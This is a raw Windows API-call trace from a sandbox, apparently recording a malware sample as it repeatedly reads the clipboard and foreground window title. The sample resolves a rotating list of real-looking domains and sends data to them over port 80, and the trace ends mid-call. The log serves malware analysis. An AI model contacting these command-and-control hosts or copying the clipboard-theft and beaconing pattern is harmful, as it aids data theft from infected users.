[0206.023] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0206.023] send (s=0x2350, buf=0x8f1cf22*, len=744, flags=0) returned 744 [0206.024] closesocket (s=0x2350) returned 0 [0206.024] socket (af=2, type=1, protocol=6) returned 0x2350 [0206.025] connect (s=0x2350, name=0xb269f30*(sa_family=2, sin_port=0x50, sin_addr="199.34.228.171"), namelen=16) returned 0 [0206.192] send (s=0x2350, buf=0x8f3a322*, len=175, flags=0) returned 175 [0206.193] setsockopt (s=0x2350, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0206.193] recv (in: s=0x2350, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 2059 [0206.414] closesocket (s=0x2350) returned 0 [0206.414] Sleep (dwMilliseconds=0x1388) [0211.431] OpenClipboard (hWndNewOwner=0x0) returned 1 [0211.431] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0211.432] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0211.432] GetForegroundWindow () returned 0x2013a [0211.432] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0211.432] GlobalUnlock (hMem=0xafaa690) returned 1 [0211.432] CloseClipboard () returned 1 [0211.432] socket (af=2, type=1, protocol=6) returned 0x1158 [0211.433] getaddrinfo (in: pNodeName="www.muintel.net", pServiceName="80", pHints=0xb293d78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293da8 | out: ppResult=0xb293da8*=0xaf82370*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269610*(sa_family=2, sin_port=0x50, sin_addr="75.2.85.42"), ai_next=0xaf826b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb2699f0*(sa_family=2, sin_port=0x50, sin_addr="99.83.196.71"), ai_next=0x0))) returned 0 [0212.335] connect (s=0x1158, name=0xb269610*(sa_family=2, sin_port=0x50, sin_addr="75.2.85.42"), namelen=16) returned 0 [0212.360] RtlIntegerToChar (in: Value=0x269, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="617") returned 0x0 [0212.360] send (s=0x1158, buf=0x8f1cf22*, len=1009, flags=0) returned 1009 [0212.361] closesocket (s=0x1158) returned 0 [0212.362] socket (af=2, type=1, protocol=6) returned 0x1158 [0212.362] connect (s=0x1158, name=0xb269610*(sa_family=2, sin_port=0x50, sin_addr="75.2.85.42"), namelen=16) returned 0 [0212.384] send (s=0x1158, buf=0x8f3a322*, len=170, flags=0) returned 170 [0212.385] setsockopt (s=0x1158, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0212.385] recv (in: s=0x1158, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 513 [0212.907] closesocket (s=0x1158) returned 0 [0212.908] Sleep (dwMilliseconds=0x1388) [0217.919] OpenClipboard (hWndNewOwner=0x0) returned 1 [0217.920] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0217.920] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0217.920] GlobalUnlock (hMem=0xafaa690) returned 1 [0217.920] CloseClipboard () returned 1 [0217.920] socket (af=2, type=1, protocol=6) returned 0x22cc [0217.920] getaddrinfo (in: pNodeName="www.update-mind.com", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0x0) returned 11001 [0218.269] getaddrinfo (in: pNodeName="www.update-mind.com", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0x0) returned 11001 [0218.270] Sleep (dwMilliseconds=0x1388) [0218.271] OpenClipboard (hWndNewOwner=0x0) returned 1 [0218.271] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0218.271] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0218.271] GlobalUnlock (hMem=0xafaa690) returned 1 [0218.272] CloseClipboard () returned 1 [0218.272] socket (af=2, type=1, protocol=6) returned 0x2270 [0218.272] getaddrinfo (in: pNodeName="www.wilbertluna.com", pServiceName="80", pHints=0xb2944b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2944e8 | out: ppResult=0xb2944e8*=0xaf818f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bb70*(sa_family=2, sin_port=0x50, sin_addr="208.91.197.91"), ai_next=0x0)) returned 0 [0218.415] connect (s=0x2270, name=0xb26bb70*(sa_family=2, sin_port=0x50, sin_addr="208.91.197.91"), namelen=16) returned 0 [0218.557] RtlIntegerToChar (in: Value=0x269, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="617") returned 0x0 [0218.557] send (s=0x2270, buf=0x8f1cf22*, len=1021, flags=0) returned 1021 [0218.557] closesocket (s=0x2270) returned 0 [0218.558] socket (af=2, type=1, protocol=6) returned 0x2270 [0218.558] connect (s=0x2270, name=0xb26bb70*(sa_family=2, sin_port=0x50, sin_addr="208.91.197.91"), namelen=16) returned 0 [0218.699] send (s=0x2270, buf=0x8f3a322*, len=174, flags=0) returned 174 [0218.699] setsockopt (s=0x2270, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0218.699] recv (in: s=0x2270, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 3120 [0218.949] closesocket (s=0x2270) returned 0 [0218.950] Sleep (dwMilliseconds=0x1388) [0218.951] OpenClipboard (hWndNewOwner=0x0) returned 1 [0218.952] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0218.952] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0218.952] GlobalUnlock (hMem=0xafaa690) returned 1 [0218.952] CloseClipboard () returned 1 [0218.952] socket (af=2, type=1, protocol=6) returned 0x2270 [0218.952] getaddrinfo (in: pNodeName="www.extrobility.com", pServiceName="80", pHints=0xb294858*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294888 | out: ppResult=0xb294888*=0xaf824f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bcb0*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), ai_next=0x0)) returned 0 [0219.023] connect (s=0x2270, name=0xb26bcb0*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), namelen=16) returned 0 [0219.054] RtlIntegerToChar (in: Value=0x269, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="617") returned 0x0 [0219.054] send (s=0x2270, buf=0x8f1cf22*, len=1021, flags=0) returned 1021 [0219.054] closesocket (s=0x2270) returned 0 [0219.055] socket (af=2, type=1, protocol=6) returned 0x2270 [0219.055] connect (s=0x2270, name=0xb26bcb0*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), namelen=16) returned 0 [0219.090] send (s=0x2270, buf=0x8f3a322*, len=174, flags=0) returned 174 [0219.090] setsockopt (s=0x2270, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0219.090] recv (in: s=0x2270, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 2923 [0219.146] closesocket (s=0x2270) returned 0 [0219.146] Sleep (dwMilliseconds=0x1388) [0219.148] OpenClipboard (hWndNewOwner=0x0) returned 1 [0219.148] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0219.148] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0219.148] GlobalUnlock (hMem=0xafaa690) returned 1 [0219.148] CloseClipboard () returned 1 [0219.148] socket (af=2, type=1, protocol=6) returned 0x2270 [0219.148] getaddrinfo (in: pNodeName="www.communication.services", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11002 [0223.568] getaddrinfo (in: pNodeName="www.communication.services", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11002 [0227.878] Sleep (dwMilliseconds=0x1388) [0227.880] OpenClipboard (hWndNewOwner=0x0) returned 1 [0227.880] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0227.880] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0227.880] GetForegroundWindow () returned 0x2013a [0227.880] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0227.880] GlobalUnlock (hMem=0xafaa690) returned 1 [0227.880] CloseClipboard () returned 1 [0227.881] Sleep (dwMilliseconds=0x1388) [0227.882] Sleep (dwMilliseconds=0x1388) [0227.884] Sleep (dwMilliseconds=0x1388) [0227.885] Sleep (dwMilliseconds=0x1388) [0227.912] Sleep (dwMilliseconds=0x1388) [0227.914] Sleep (dwMilliseconds=0x1388) [0227.915] Sleep (dwMilliseconds=0x1388) [0227.917] OpenClipboard (hWndNewOwner=0x0) returned 1 [0227.917] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0227.917] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0227.917] GlobalUnlock (hMem=0xafaa690) returned 1 [0227.917] CloseClipboard () returned 1 [0227.917] socket (af=2, type=1, protocol=6) returned 0x22b4 [0227.918] getaddrinfo (in: pNodeName="www.eleonoritalia.com", pServiceName="80", pHints=0xb295338*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb295368 | out: ppResult=0xb295368*=0xaf82570*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), ai_next=0x0)) returned 0 [0227.988] connect (s=0x22b4, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0228.056] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0228.056] send (s=0x22b4, buf=0x8f1cf22*, len=1307, flags=0) returned 1307 [0228.056] closesocket (s=0x22b4) returned 0 [0228.057] socket (af=2, type=1, protocol=6) returned 0x22b4 [0228.058] connect (s=0x22b4, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0228.120] send (s=0x22b4, buf=0x8f3a322*, len=176, flags=0) returned 176 [0228.120] setsockopt (s=0x22b4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0228.121] recv (in: s=0x22b4, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5276 [0228.207] closesocket (s=0x22b4) returned 0 [0228.207] Sleep (dwMilliseconds=0x1388) [0228.213] OpenClipboard (hWndNewOwner=0x0) returned 1 [0228.213] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0228.213] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0228.213] GlobalUnlock (hMem=0xafaa690) returned 1 [0228.213] CloseClipboard () returned 1 [0228.213] socket (af=2, type=1, protocol=6) returned 0x968 [0228.214] getaddrinfo (in: pNodeName="www.cpcacursos.com", pServiceName="80", pHints=0xb2956d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb295708 | out: ppResult=0xb295708*=0xaf83c30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), ai_next=0x0)) returned 0 [0228.491] connect (s=0x968, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0228.628] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0228.628] send (s=0x968, buf=0x8f1cf22*, len=1298, flags=0) returned 1298 [0228.628] closesocket (s=0x968) returned 0 [0228.629] socket (af=2, type=1, protocol=6) returned 0x968 [0228.629] connect (s=0x968, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0228.769] send (s=0x968, buf=0x8f3a322*, len=173, flags=0) returned 173 [0228.770] setsockopt (s=0x968, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0228.770] recv (in: s=0x968, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0229.270] closesocket (s=0x968) returned 0 [0229.271] Sleep (dwMilliseconds=0x1388) [0229.273] OpenClipboard (hWndNewOwner=0x0) returned 1 [0229.273] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0229.273] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0229.273] GlobalUnlock (hMem=0xafaa690) returned 1 [0229.273] CloseClipboard () returned 1 [0229.274] socket (af=2, type=1, protocol=6) returned 0x968 [0229.274] getaddrinfo (in: pNodeName="www.mindbodyweightlossmethod.com", pServiceName="80", pHints=0xb295a78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb295aa8 | out: ppResult=0xb295aa8*=0xaf83c70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), ai_next=0x0)) returned 0 [0229.313] connect (s=0x968, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0229.424] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0229.425] send (s=0x968, buf=0x8f1cf22*, len=1340, flags=0) returned 1340 [0229.425] closesocket (s=0x968) returned 0 [0229.481] socket (af=2, type=1, protocol=6) returned 0x968 [0229.481] connect (s=0x968, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0229.516] send (s=0x968, buf=0x8f3a322*, len=187, flags=0) returned 187 [0229.516] setsockopt (s=0x968, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0229.516] recv (in: s=0x968, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 4225 [0229.575] closesocket (s=0x968) returned 0 [0229.576] Sleep (dwMilliseconds=0x1388) [0229.600] OpenClipboard (hWndNewOwner=0x0) returned 1 [0229.600] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0229.600] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0229.600] GlobalUnlock (hMem=0xafaa690) returned 1 [0229.600] CloseClipboard () returned 1 [0229.601] socket (af=2, type=1, protocol=6) returned 0x968 [0229.601] getaddrinfo (in: pNodeName="www.dalainstitute.info", pServiceName="80", pHints=0xb295e18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb295e48 | out: ppResult=0xb295e48*=0xaf805f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), ai_next=0x0)) returned 0 [0229.982] connect (s=0x968, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0230.025] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0230.025] send (s=0x968, buf=0x8f1cf22*, len=1310, flags=0) returned 1310 [0230.025] closesocket (s=0x968) returned 0 [0230.025] socket (af=2, type=1, protocol=6) returned 0x968 [0230.026] connect (s=0x968, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0230.066] send (s=0x968, buf=0x8f3a322*, len=177, flags=0) returned 177 [0230.067] setsockopt (s=0x968, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0230.067] recv (in: s=0x968, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 926 [0230.148] closesocket (s=0x968) returned 0 [0230.149] Sleep (dwMilliseconds=0x1388) [0230.150] OpenClipboard (hWndNewOwner=0x0) returned 1 [0230.150] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0230.150] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0230.150] GlobalUnlock (hMem=0xafaa690) returned 1 [0230.150] CloseClipboard () returned 1 [0230.151] socket (af=2, type=1, protocol=6) returned 0x968 [0230.151] getaddrinfo (in: pNodeName="www.joannhydeyoga.com", pServiceName="80", pHints=0xb2961b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2961e8 | out: ppResult=0xb2961e8*=0xaf81670*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), ai_next=0x0)) returned 0 [0230.438] connect (s=0x968, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0230.456] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0230.456] send (s=0x968, buf=0x8f1cf22*, len=1307, flags=0) returned 1307 [0230.457] closesocket (s=0x968) returned 0 [0230.457] socket (af=2, type=1, protocol=6) returned 0x968 [0230.457] connect (s=0x968, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0230.480] send (s=0x968, buf=0x8f3a322*, len=176, flags=0) returned 176 [0230.480] setsockopt (s=0x968, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0230.480] recv (in: s=0x968, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0230.980] closesocket (s=0x968) returned 0 [0230.981] Sleep (dwMilliseconds=0x1388) [0230.982] OpenClipboard (hWndNewOwner=0x0) returned 1 [0230.982] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0230.982] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0230.982] GlobalUnlock (hMem=0xafaa690) returned 1 [0230.983] CloseClipboard () returned 1 [0230.983] socket (af=2, type=1, protocol=6) returned 0x968 [0230.983] getaddrinfo (in: pNodeName="www.theravewizards.com", pServiceName="80", pHints=0xb296558*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296588 | out: ppResult=0xb296588*=0xaf82ef0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), ai_next=0xaf82ff0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b910*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.211"), ai_next=0xaf82870*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b930*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), ai_next=0xaf825b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bdd0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.217"), ai_next=0xaf82670*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26bb50*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.210"), ai_next=0xaf829f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b610*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.218"), ai_next=0xaf82a30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b9f0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.215"), ai_next=0x0)))))))) returned 0 [0231.025] connect (s=0x968, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0231.197] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0231.198] send (s=0x968, buf=0x8f1cf22*, len=1310, flags=0) returned 1310 [0231.198] closesocket (s=0x968) returned 0 [0231.198] socket (af=2, type=1, protocol=6) returned 0x968 [0231.199] connect (s=0x968, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0231.389] send (s=0x968, buf=0x8f3a322*, len=177, flags=0) returned 177 [0231.389] setsockopt (s=0x968, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0231.389] recv (in: s=0x968, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0231.564] closesocket (s=0x968) returned 0 [0231.564] Sleep (dwMilliseconds=0x1388) [0231.566] OpenClipboard (hWndNewOwner=0x0) returned 1 [0231.566] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0231.566] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0231.566] GlobalUnlock (hMem=0xafaa690) returned 1 [0231.566] CloseClipboard () returned 1 [0231.567] socket (af=2, type=1, protocol=6) returned 0x968 [0231.567] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0231.583] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0231.583] Sleep (dwMilliseconds=0x1388) [0231.585] OpenClipboard (hWndNewOwner=0x0) returned 1 [0231.585] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0231.585] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0231.585] GlobalUnlock (hMem=0xafaa690) returned 1 [0231.585] CloseClipboard () returned 1 [0231.586] socket (af=2, type=1, protocol=6) returned 0x1144 [0231.586] getaddrinfo (in: pNodeName="www.metaverse-coaching.com", pServiceName="80", pHints=0xb296c98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296cc8 | out: ppResult=0xb296cc8*=0xb0e3570*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), ai_next=0x0)) returned 0 [0231.857] connect (s=0x1144, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0232.118] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0232.118] send (s=0x1144, buf=0x8f1cf22*, len=1322, flags=0) returned 1322 [0232.119] closesocket (s=0x1144) returned 0 [0232.119] socket (af=2, type=1, protocol=6) returned 0x1144 [0232.119] connect (s=0x1144, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0232.388] send (s=0x1144, buf=0x8f3a322*, len=181, flags=0) returned 181 [0232.388] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0232.389] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 367 [0232.677] closesocket (s=0x1144) returned 0 [0232.677] Sleep (dwMilliseconds=0x1388) [0232.679] OpenClipboard (hWndNewOwner=0x0) returned 1 [0232.679] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0232.679] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0232.679] GlobalUnlock (hMem=0xafaa690) returned 1 [0232.679] CloseClipboard () returned 1 [0232.737] socket (af=2, type=1, protocol=6) returned 0x1144 [0232.737] getaddrinfo (in: pNodeName="www.mylyk.net", pServiceName="80", pHints=0xb293638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293668 | out: ppResult=0xb293668*=0xb0e2ff0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26ba30*(sa_family=2, sin_port=0x50, sin_addr="104.21.94.157"), ai_next=0xb0e3e30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b650*(sa_family=2, sin_port=0x50, sin_addr="172.67.137.204"), ai_next=0x0))) returned 0 [0232.835] connect (s=0x1144, name=0xb26ba30*(sa_family=2, sin_port=0x50, sin_addr="104.21.94.157"), namelen=16) returned 0 [0232.865] send (s=0x1144, buf=0x8f3a322*, len=159, flags=0) returned 159 [0232.866] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0232.866] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 741 [0232.980] closesocket (s=0x1144) returned 0 [0232.981] Sleep (dwMilliseconds=0x1388) [0232.982] OpenClipboard (hWndNewOwner=0x0) returned 1 [0232.982] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0232.983] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0232.983] GlobalUnlock (hMem=0xafaa690) returned 1 [0232.983] CloseClipboard () returned 1 [0232.983] socket (af=2, type=1, protocol=6) returned 0x1144 [0232.983] getaddrinfo (in: pNodeName="www.eleonoritalia.com", pServiceName="80", pHints=0xb2939d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293a08 | out: ppResult=0xb293a08*=0xb0e5270*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b6b0*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), ai_next=0x0)) returned 0 [0232.984] connect (s=0x1144, name=0xb26b6b0*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0233.043] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0233.043] send (s=0x1144, buf=0x8f1cf22*, len=1307, flags=0) returned 1307 [0233.044] closesocket (s=0x1144) returned 0 [0233.044] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.044] connect (s=0x1144, name=0xb26b6b0*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0233.109] send (s=0x1144, buf=0x8f3a322*, len=167, flags=0) returned 167 [0233.110] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0233.110] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5267 [0233.193] closesocket (s=0x1144) returned 0 [0233.194] Sleep (dwMilliseconds=0x1388) [0233.196] OpenClipboard (hWndNewOwner=0x0) returned 1 [0233.196] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0233.196] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0233.196] GlobalUnlock (hMem=0xafaa690) returned 1 [0233.196] CloseClipboard () returned 1 [0233.196] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.196] getaddrinfo (in: pNodeName="www.extrobility.com", pServiceName="80", pHints=0xb293d78*(ai_flags=0, ai_family=2, ai_socktype=1, 